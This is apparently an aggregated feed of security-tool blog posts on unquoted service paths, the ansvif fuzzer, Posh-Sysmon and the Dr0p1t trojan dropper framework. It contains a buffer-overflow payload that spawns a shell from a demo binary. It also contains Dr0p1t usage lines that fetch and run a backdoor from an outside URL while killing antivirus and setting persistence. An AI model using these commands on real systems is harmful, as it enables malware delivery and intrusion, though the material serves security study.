Unquoted Service Path

In Windows environments when a service is started the system is attempting to find the location of the executable in order to successfully launch the service. If the executable is enclosed in quote tags “” then the system will know where to find it. However if the path of where the application binary is located doesn’t contain any quotes then […]

Link: https://pentestlab.blog/2017/03/09/unquoted-service-path/

ansvif – An Advanced Fuzzing Framework Designed To Find Vulnerabilities In C/C++ Code.

ansvif, written primarily in C++, is designed to find code bugs by throwing garbage input at programs to see how they react. This is great for finding bugs, because not every type of input is always handled, and buffers are not always checked, etc. It also comes in handy when writing (and protecting against), buffer overflow exploitation, as well as string input validation vulnerabilities (the %s bug). Dependancies: automake autoconf-archive zlib1g-dev libcrypto++ g++ gcc Compliation: Linux: $ aclocal && autoconf && automake -a && ./configure && makeOr, if you would like to play with the syscall fuzzer:$ aclocal && autoconf && automake -a && ./configure –enable-syscalls && make OpenBSD: $ AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e ‘s/.*-//’`\AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e ‘s/.*-//’`\aclocal && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e ‘s/.*-//’`\AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e ‘s/.*-//’`\autoconf && AUTOMAKE_VERSION=`ls /usr/local/bin/automake-* | head -n 1 | sed -e ‘s/.*-//’`\AUTOCONF_VERSION=`ls /usr/local/bin/autoconf-* | head -n 1 | sed -e ‘s/.*-//’` automake -a\&& CXX=eg++ ./configure && make Windows: Windows binaries are now desgined to be compiled with MinGW-W64 (since we use threading download a version of MinGW-W64 g++ with seh). (Go to where you installed MinGW-W64 and click mingw-64.bat)g++.exe src/common.cpp src/win/bin2hex.cpp src/win/bin2hex_pc.cpp src/win/popen2.cpp src/win/main.cpp src/win/help.cpp src/match_seg.cpp src/win/sys_string.cpp src/win/sys_string_pc.cpp src/win/man_read.cpp src/randomizer.cpp src/trash.cpp -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++gcc src/win/printf.c -o printf.exeNote: cygwin .dll external files are no longer required as we now compile with g++ from MinGW. In Windows 7 Powershell v2 is installed by default, however, this program requires atleast Powershell v5. Windows 10 includes powershell v5. You can go to Microsoft’s site and download the Windows Management Framework (which includes newer Versions of Powershell here: https://www.microsoft.com/en-us/download/details.aspx?id=50395 Testing: If you would like to try out the example code, you can compile faulty.c with: $ gcc faulty.c -o faultyUsing the example code: You can point the memory back at address \xff\x05\x40\x00\x00\x00\x00\x00 (the subroutine containing the code that spawns bash) with: $ ./faulty -a $(perl -e ‘print “A"x24;print "\x00\xff\x05\x40\x00\x00\x00\x00\x00"’) The address may be a little different under your distro, check gdb if you really want to try it out. The code above /should/ drop you at a bash prompt. If the code is set to a mode where all are able to execute as another user, it will attempt to spawn a root shell. or simply run make test . Usage: Important note: Windows users will have to run ansvif.exe from Powershell for it to work! $ ./find_suid /usr/bin/ /bin/ /sbin/$ ./ansvif -[tm] [template/manpage] -c /path/to/executable -b buffersize Examples: Linux/BSD: $ echo "Marshall" ./ansvif -t examples/template -c ./faulty -b 64$ ./ansvif -m mount -c /bin/mount -e examples/mount_e.txt -x examples/mount_o.txt\-f 8 -b 2048$ ./ansvif -t examples/blank.txt -F tmp/tmphtml -x examples/htmltags.txt -c /usr/bin/iceweasel -b\128 -A "file:///home/username/src/ansvif/tmp/tmphtml" -f 2 -n -R "sleep 3 && killall\iceweasel" -S ">"$ cat examples/linux_syscalls_implemented.list | xargs -P \`cat examples/linux_syscalls_implemented.list | wc -l` -I {calls} ./ansvif -t examples/space.txt \-B "{calls} " -c ./syscalls -o syscall_crash -f 1 -z -d -b 16 Windows: PS C:\ansvif\bin\ansvif_win> .\ansvif -t ..\..\examples\space -F ..\..\tmp\tmphtml -x `..\..\examples\htmltags -c `’C:\Program Files (x86)\Google\Chrome\Application\chrome.exe’ `-b 128 -A "file:///C:\\Users\marsh\OneDrive\Documents\Code\ansvif\tmp\tmphtml" `-f 2 -n -S ">" -R "sleep 2 ; Stop-Process -Name chrome" Options: -t This file should hold line by line command arguments as shown in the example file. -e This file should hold line by line environment variables as shown in the example file. You can usually get these by doing something like: $ strings /bin/mount | perl -ne ‘print if /[A-Z]=$/’ > mount_envs -c Specifies the command path. -p Specifies the manpage location (as an integer, usually 1 or 8) -m Specifies the commands manpage. -D Dumps whats found in the manpage. -f Number of threads to use. Default is 2. -b Specifies the buffer size to fuzz with. 256-2048 Is usually sufficient. -r Uses only random garbage data. -o Writes output to log file. -z Randomize the buffer size from 1 to what is specified by -b. -x Other junk to put in. Usernames and such can go here. -S Seperator between options. -s Omitted character specification. Defaults are <>\\n |&\[]\()\{}:;\ and newline is mandatory. -T Timeout for threads. -W Timeout for threads. -L Unpriviledged user to run as if root. -A Always put whats after this after command to run. -B Always put whats after this before the command to run. -F File to feed into the program that -x along with normal fuzzing data will be put in. -n Never use random data in the fuzz. -R Run this command after each fuzz. -C A Non standard error code to detect. -V Use Valgrind if installed. -1 Try to make it fault once, if it doesn’t happen, throw error code 64. Useful for scripting. -P Use % to represent binary in fuzz. -M Max arguments to use in the fuzz. -y Short for -b 0 and usually only useful with -A or -B -K Keep fuzzing after a crash in the target. -v Verbose. -d Debug data. -h Shows the help page. Recommendations: It is recommended that if you are doing long fuzzes or file fuzzing, if possible put the files (including the binary you are fuzzing if possible) in memory. This means, put them somewhere like /var/run/shm where disk thrash will be minimal, and fuzzing will be somewhat faster, especially if large files are being handled. Be warned however: You will lose your fuzzed files if they are in shm and you reboot the machine! DO NOT RUN THIS CODE IN A PRODUCTION ENVIRONMENT! If you try setting faulty.c’s output to suid(0) then PLEASE do it in a virtual machine. or atleast a machine that you don’t care about. Other than that, just play around and have fun! Notes: Windows users must have ansvif running from Powershell. Linux and Windows code should be relatively stable. Syscall fuzzing under linux is under heavy development. Download ansvif

Link: http://feedproxy.google.com/~r/PentestTools/~3/RfFeMT6E2yc/ansvif-advanced-fuzzing-framework.html

Posh-Sysmon Module for Creating Sysmon Configuration Files

Sysmon configuration can be complex in addition to hard to maintain by hand. For this purpose I created a module called Posh-Sysmon some time ago to aid in the creation and maintenance of configuration files. The module was initially written after the release of version 2.0 and has been maintained and expanded as new version have been released all the way to the current one at the time of this blog post being written with version 6.0. 
The module is written for PowerShell v3.0 and above and can be installed from the PowerShell Gallery if running version 5.0 or 5.1 using the cmdlet 

Link: http://www.darkoperator.com/blog/2017/2/17/posh-sysmon-powershell-module-for-creating-sysmon-configuration-files

Dr0p1t-Framework – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ? you can read about them from here .Dr0p1t let you create dropper like any tool but this time FUD with some tricks 😉 Features Works with Windows and Linux Adding malware after downloading it to startup Adding malware after downloading it to task scheduler Finding and killing the antivirus before running the malware Running a custom (batch|powershell|vbs) file you have choosen before running the malware In running powershell scripts it can bypass execution policy Using UPX to compress the dropper after creating it Choose an icon for the dropper after creating it Screenshots On Windows On Linux (Backbox) Help menu Usage: Dr0p1t.py Malware_Url [Options]options: -h, –help show this help message and exit -s Add your malware to startup (Persistence) -t Add your malware to task scheduler (Persistence) -k Kill antivirus process before running your malware. -b Run this batch script before running your malware. Check scripts folder -p Run this powershell script before running your malware. Check scripts folder -v Run this vbs script before running your malware. Check scripts folder –only32 Download your malware for 32 bit devices only –only64 Download your malware for 64 bit devices only –upx Use UPX to compress the final file. -i Use icon to the final file. Check icons folder. -q Stay quite ( no banner ) -u Check for updates -nd Display less output information Examples ./Dr0p1t.py https://test.com/backdoor.exe -s -t -k –upx./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat –only32./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1 Prerequisites Python 3.x( prefered 3.5 ) Python libraries requirements in requirements.txt Installation First download it by git clone https://github.com/D4Vinci/Dr0p1t-Frameworkif you are on linux and do cd Dr0p1t-Frameworkpip install -r requirements.txt./Dr0p1t.pyAnd if you are on windows download it and then do cd Dr0p1t-Frameworkpip install -r requirements.txtpip install -r windows_requirements.txt./Dr0p1t.pyLibraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible Todo Python 2 support Work on UAC bypass Work on spreading on device and may be in lan too Injecting dr0pp3r to another program More modules Download Dr0p1t-Framework

Link: http://feedproxy.google.com/~r/PentestTools/~3/JXvzQSkcB8s/dr0p1t-framework-framework-that-creates.html